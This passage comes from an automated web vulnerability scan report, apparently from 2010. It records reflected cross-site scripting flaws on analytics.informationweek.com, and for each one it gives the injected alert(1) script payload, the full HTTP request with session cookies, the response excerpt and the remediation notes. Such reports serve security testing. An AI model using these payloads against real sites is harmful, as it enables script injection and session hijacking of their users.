Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenufa9da--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6bac0ed8397%2F2%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload fcfd3--><script>alert(1)</script>e7060e8fad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F2fcfd3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee7060e8fad5%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ca2d--><script>alert(1)</script>e052c9eff64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s-continuity9ca2d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee052c9eff64%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 75b36--><script>alert(1)</script>06300418583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:05 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ontinuity.html75b36--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E06300418583&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583"> ...[SNIP]...
3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2e793--><script>alert(1)</script>2cc393b4e14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... y.html%3F2e793--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cc393b4e14%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9f503--><script>alert(1)</script>6ba192a2efa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6ba192a2efa%2F20%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2af97--><script>alert(1)</script>2b34991a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2b34991a0a3%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 49eb2--><script>alert(1)</script>3dbbea7fb8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3dbbea7fb8e%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload b6e88--><script>alert(1)</script>23a19effe18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management/Network-systems-management.htmlb6e88--><script>alert(1)</script>23a19effe18 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... --%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E23a19effe18&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.htmlb6e88--><script>alert(1)</script>23a19effe18"> ...[SNIP]...
3.100. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 13ba0--><script>alert(1)</script>7d3b721c276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management/Network-systems-management.html?13ba0--><script>alert(1)</script>7d3b721c276=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Cscript%3Ealert%281%29%3C%2Fscript%3E7d3b721c276%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html?13ba0--><script>alert(1)</script>7d3b721c276=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 76dbc--><script>alert(1)</script>0f469ebcbb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu76dbc--><script>alert(1)</script>0f469ebcbb1/21/Security/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fmenu76dbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f469ebcbb1%2F21%2FSecurity%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu76dbc--><script>alert(1)</script>0f469ebcbb1/21/Security/Security.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 82301--><script>alert(1)</script>ba02e432406 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2182301--><script>alert(1)</script>ba02e432406/Security/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... informationweek.com%2Fmenu%2F2182301--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eba02e432406%2FSecurity%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2182301--><script>alert(1)</script>ba02e432406/Security/Security.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e5e4--><script>alert(1)</script>5b8f09d378b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security9e5e4--><script>alert(1)</script>5b8f09d378b/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:20 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... onweek.com%2Fmenu%2F21%2FSecurity9e5e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5b8f09d378b%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security9e5e4--><script>alert(1)</script>5b8f09d378b/Security.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 10b99--><script>alert(1)</script>56e6ba882ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security/Security.html10b99--><script>alert(1)</script>56e6ba882ec HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:37 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:37 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... enu%2F21%2FSecurity%2FSecurity.html10b99--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E56e6ba882ec&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/21/Security/Security.html10b99--><script>alert(1)</script>56e6ba882ec"> ...[SNIP]...
3.105. http://analytics.informationweek.com/menu/21/Security/Security.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/21/Security/Security.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c6fae--><script>alert(1)</script>d4745af9c41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/21/Security/Security.html?c6fae--><script>alert(1)</script>d4745af9c41=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
